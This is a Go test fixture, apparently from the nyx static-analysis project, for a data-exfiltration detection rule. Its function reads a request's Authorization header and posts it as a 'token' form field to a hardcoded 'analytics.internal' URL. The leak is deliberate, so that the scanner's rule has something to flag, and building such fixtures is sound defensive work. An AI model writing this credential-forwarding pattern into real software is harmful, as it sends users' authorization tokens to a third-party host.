mirror of
https://github.com/elicpeter/nyx.git
synced 2026-06-30 20:39:39 +02:00
19 lines
535 B
Go
19 lines
535 B
Go
|
|
// DATA_EXFIL fixture: a Sensitive (header) source flowing into the form
|
||
|
|
// payload of `http.PostForm` (arg 1, `url.Values`). The destination URL
|
||
|
|
// is hardcoded so SSRF does not fire; only the form-data path activates
|
||
|
|
// the body-position gate.
|
||
|
|
//
|
||
|
|
// Driven by `data_exfil_go_integration_tests.rs`.
|
||
|
|
package fixture
|
||
|
|
|
||
|
|
import (
|
||
|
|
"net/http"
|
||
|
|
"net/url"
|
||
|
|
)
|
||
|
|
|
||
|
|
func leakAuthHeader(r *http.Request) {
|
||
|
|
auth := r.Header.Get("Authorization")
|
||
|
|
form := url.Values{"token": []string{auth}}
|
||
|
|
http.PostForm("https://analytics.internal/track", form)
|
||
|
|
}
|